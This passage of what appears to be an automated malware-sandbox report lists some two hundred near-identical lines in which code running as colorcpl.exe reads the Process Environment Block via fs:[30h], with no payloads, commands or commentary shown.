              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629A40 mov ecx, dword ptr fs:[00000030h]3_2_1E629A40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DA20 mov eax, dword ptr fs:[00000030h]3_2_1E65DA20
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DA20 mov eax, dword ptr fs:[00000030h]3_2_1E65DA20
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov ecx, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BA30 mov eax, dword ptr fs:[00000030h]3_2_1E63BA30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DBA0B mov eax, dword ptr fs:[00000030h]3_2_1E6DBA0B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DBA0B mov eax, dword ptr fs:[00000030h]3_2_1E6DBA0B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DBA0B mov eax, dword ptr fs:[00000030h]3_2_1E6DBA0B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DBA0B mov eax, dword ptr fs:[00000030h]3_2_1E6DBA0B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665A01 mov eax, dword ptr fs:[00000030h]3_2_1E665A01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665A01 mov ecx, dword ptr fs:[00000030h]3_2_1E665A01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665A01 mov eax, dword ptr fs:[00000030h]3_2_1E665A01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665A01 mov eax, dword ptr fs:[00000030h]3_2_1E665A01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFA02 mov eax, dword ptr fs:[00000030h]3_2_1E6EFA02
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BA10 mov eax, dword ptr fs:[00000030h]3_2_1E62BA10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6ADA1D mov eax, dword ptr fs:[00000030h]3_2_1E6ADA1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D7A11 mov edi, dword ptr fs:[00000030h]3_2_1E6D7A11
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E659A18 mov ecx, dword ptr fs:[00000030h]3_2_1E659A18
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BAE0 mov eax, dword ptr fs:[00000030h]3_2_1E62BAE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B1ACB mov eax, dword ptr fs:[00000030h]3_2_1E6B1ACB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B1ACB mov ecx, dword ptr fs:[00000030h]3_2_1E6B1ACB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5AD0 mov eax, dword ptr fs:[00000030h]3_2_1E6C5AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65BADA mov eax, dword ptr fs:[00000030h]3_2_1E65BADA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDAAC mov ecx, dword ptr fs:[00000030h]3_2_1E6DDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDAAC mov ecx, dword ptr fs:[00000030h]3_2_1E6DDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDAAC mov eax, dword ptr fs:[00000030h]3_2_1E6DDAAC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BAA0 mov eax, dword ptr fs:[00000030h]3_2_1E63BAA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BAA0 mov eax, dword ptr fs:[00000030h]3_2_1E63BAA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FAA4 mov ecx, dword ptr fs:[00000030h]3_2_1E62FAA4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DAAE mov eax, dword ptr fs:[00000030h]3_2_1E65DAAE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E1AA3 mov eax, dword ptr fs:[00000030h]3_2_1E6E1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E1AA3 mov eax, dword ptr fs:[00000030h]3_2_1E6E1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E1AA3 mov eax, dword ptr fs:[00000030h]3_2_1E6E1AA3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627A80 mov eax, dword ptr fs:[00000030h]3_2_1E627A80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627A80 mov eax, dword ptr fs:[00000030h]3_2_1E627A80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627A80 mov eax, dword ptr fs:[00000030h]3_2_1E627A80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFA87 mov eax, dword ptr fs:[00000030h]3_2_1E6EFA87
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3B60 mov eax, dword ptr fs:[00000030h]3_2_1E6D3B60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FB4C mov edi, dword ptr fs:[00000030h]3_2_1E62FB4C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5B50 mov eax, dword ptr fs:[00000030h]3_2_1E6C5B50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5B50 mov eax, dword ptr fs:[00000030h]3_2_1E6C5B50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B28 mov eax, dword ptr fs:[00000030h]3_2_1E669B28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B28 mov eax, dword ptr fs:[00000030h]3_2_1E669B28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703B10 mov eax, dword ptr fs:[00000030h]3_2_1E703B10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFB0C mov eax, dword ptr fs:[00000030h]3_2_1E6EFB0C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov eax, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DB00 mov edx, dword ptr fs:[00000030h]3_2_1E65DB00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E631B04 mov eax, dword ptr fs:[00000030h]3_2_1E631B04
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E631B04 mov eax, dword ptr fs:[00000030h]3_2_1E631B04
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671BEF mov eax, dword ptr fs:[00000030h]3_2_1E671BEF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671BEF mov eax, dword ptr fs:[00000030h]3_2_1E671BEF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFBF3 mov eax, dword ptr fs:[00000030h]3_2_1E6EFBF3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E639BC4 mov eax, dword ptr fs:[00000030h]3_2_1E639BC4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627BCD mov eax, dword ptr fs:[00000030h]3_2_1E627BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627BCD mov ecx, dword ptr fs:[00000030h]3_2_1E627BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643BD6 mov eax, dword ptr fs:[00000030h]3_2_1E643BD6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFBDC mov eax, dword ptr fs:[00000030h]3_2_1E6BFBDC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFBDC mov eax, dword ptr fs:[00000030h]3_2_1E6BFBDC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFBDC mov eax, dword ptr fs:[00000030h]3_2_1E6BFBDC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65DBA0 mov eax, dword ptr fs:[00000030h]3_2_1E65DBA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F9B8B mov eax, dword ptr fs:[00000030h]3_2_1E6F9B8B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F9B8B mov eax, dword ptr fs:[00000030h]3_2_1E6F9B8B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703B80 mov eax, dword ptr fs:[00000030h]3_2_1E703B80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703B80 mov eax, dword ptr fs:[00000030h]3_2_1E703B80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703B80 mov eax, dword ptr fs:[00000030h]3_2_1E703B80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B9F mov eax, dword ptr fs:[00000030h]3_2_1E669B9F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B9F mov eax, dword ptr fs:[00000030h]3_2_1E669B9F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669B9F mov eax, dword ptr fs:[00000030h]3_2_1E669B9F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFB97 mov eax, dword ptr fs:[00000030h]3_2_1E6EFB97
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62D860 mov eax, dword ptr fs:[00000030h]3_2_1E62D860
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661876 mov eax, dword ptr fs:[00000030h]3_2_1E661876
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661876 mov eax, dword ptr fs:[00000030h]3_2_1E661876
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62D878 mov eax, dword ptr fs:[00000030h]3_2_1E62D878
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671843 mov eax, dword ptr fs:[00000030h]3_2_1E671843
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E663820 mov eax, dword ptr fs:[00000030h]3_2_1E663820
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BD820 mov ecx, dword ptr fs:[00000030h]3_2_1E6BD820
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BD820 mov eax, dword ptr fs:[00000030h]3_2_1E6BD820
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BD820 mov eax, dword ptr fs:[00000030h]3_2_1E6BD820
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66182A mov eax, dword ptr fs:[00000030h]3_2_1E66182A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF80A mov eax, dword ptr fs:[00000030h]3_2_1E6EF80A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E659803 mov eax, dword ptr fs:[00000030h]3_2_1E659803
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D1800 mov eax, dword ptr fs:[00000030h]3_2_1E6D1800
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D1800 mov eax, dword ptr fs:[00000030h]3_2_1E6D1800
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6438E0 mov eax, dword ptr fs:[00000030h]3_2_1E6438E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6438E0 mov eax, dword ptr fs:[00000030h]3_2_1E6438E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6438E0 mov eax, dword ptr fs:[00000030h]3_2_1E6438E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B98E7 mov eax, dword ptr fs:[00000030h]3_2_1E6B98E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF8F8 mov eax, dword ptr fs:[00000030h]3_2_1E6EF8F8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6338C4 mov eax, dword ptr fs:[00000030h]3_2_1E6338C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6378D9 mov eax, dword ptr fs:[00000030h]3_2_1E6378D9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6378D9 mov eax, dword ptr fs:[00000030h]3_2_1E6378D9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6ED8B0 mov eax, dword ptr fs:[00000030h]3_2_1E6ED8B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6ED8B0 mov eax, dword ptr fs:[00000030h]3_2_1E6ED8B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF889 mov eax, dword ptr fs:[00000030h]3_2_1E6EF889
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6CB890 mov eax, dword ptr fs:[00000030h]3_2_1E6CB890
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6CB890 mov eax, dword ptr fs:[00000030h]3_2_1E6CB890
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627967 mov eax, dword ptr fs:[00000030h]3_2_1E627967
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E657962 mov eax, dword ptr fs:[00000030h]3_2_1E657962
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66196E mov eax, dword ptr fs:[00000030h]3_2_1E66196E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66196E mov eax, dword ptr fs:[00000030h]3_2_1E66196E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B5960 mov eax, dword ptr fs:[00000030h]3_2_1E6B5960
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EF97D mov eax, dword ptr fs:[00000030h]3_2_1E6EF97D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66B970 mov eax, dword ptr fs:[00000030h]3_2_1E66B970
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66B970 mov eax, dword ptr fs:[00000030h]3_2_1E66B970
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66B970 mov eax, dword ptr fs:[00000030h]3_2_1E66B970
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D978 mov eax, dword ptr fs:[00000030h]3_2_1E65D978
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63F950 mov eax, dword ptr fs:[00000030h]3_2_1E63F950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63F950 mov eax, dword ptr fs:[00000030h]3_2_1E63F950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E649950 mov eax, dword ptr fs:[00000030h]3_2_1E649950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E649950 mov eax, dword ptr fs:[00000030h]3_2_1E649950
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BB953 mov eax, dword ptr fs:[00000030h]3_2_1E6BB953
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627931 mov eax, dword ptr fs:[00000030h]3_2_1E627931
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E5930 mov eax, dword ptr fs:[00000030h]3_2_1E6E5930
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E5930 mov ecx, dword ptr fs:[00000030h]3_2_1E6E5930
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62F910 mov eax, dword ptr fs:[00000030h]3_2_1E62F910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65B919 mov eax, dword ptr fs:[00000030h]3_2_1E65B919
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D5910 mov eax, dword ptr fs:[00000030h]3_2_1E6D5910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EB9EE mov eax, dword ptr fs:[00000030h]3_2_1E6EB9EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EB9EE mov ecx, dword ptr fs:[00000030h]3_2_1E6EB9EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EB9EE mov eax, dword ptr fs:[00000030h]3_2_1E6EB9EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B19EE mov eax, dword ptr fs:[00000030h]3_2_1E6B19EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B19EE mov eax, dword ptr fs:[00000030h]3_2_1E6B19EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B19EE mov eax, dword ptr fs:[00000030h]3_2_1E6B19EE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6359C0 mov eax, dword ptr fs:[00000030h]3_2_1E6359C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6359C0 mov eax, dword ptr fs:[00000030h]3_2_1E6359C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6359C0 mov eax, dword ptr fs:[00000030h]3_2_1E6359C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6359C0 mov eax, dword ptr fs:[00000030h]3_2_1E6359C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70B9DF mov eax, dword ptr fs:[00000030h]3_2_1E70B9DF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70B9DF mov eax, dword ptr fs:[00000030h]3_2_1E70B9DF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D9D0 mov eax, dword ptr fs:[00000030h]3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D9D0 mov eax, dword ptr fs:[00000030h]3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D9D0 mov esi, dword ptr fs:[00000030h]3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D9D0 mov eax, dword ptr fs:[00000030h]3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D9D0 mov eax, dword ptr fs:[00000030h]3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D9D0 mov eax, dword ptr fs:[00000030h]3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D9D0 mov eax, dword ptr fs:[00000030h]3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65D9D0 mov eax, dword ptr fs:[00000030h]3_2_1E65D9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6399BE mov eax, dword ptr fs:[00000030h]3_2_1E6399BE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E598D mov eax, dword ptr fs:[00000030h]3_2_1E6E598D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E598D mov eax, dword ptr fs:[00000030h]3_2_1E6E598D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E598D mov eax, dword ptr fs:[00000030h]3_2_1E6E598D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B9983 mov eax, dword ptr fs:[00000030h]3_2_1E6B9983
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62B991 mov eax, dword ptr fs:[00000030h]3_2_1E62B991
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62B991 mov eax, dword ptr fs:[00000030h]3_2_1E62B991
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov ecx, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov ecx, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DF99B mov eax, dword ptr fs:[00000030h]3_2_1E6DF99B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669660 mov eax, dword ptr fs:[00000030h]3_2_1E669660
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669660 mov eax, dword ptr fs:[00000030h]3_2_1E669660
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6CD660 mov eax, dword ptr fs:[00000030h]3_2_1E6CD660
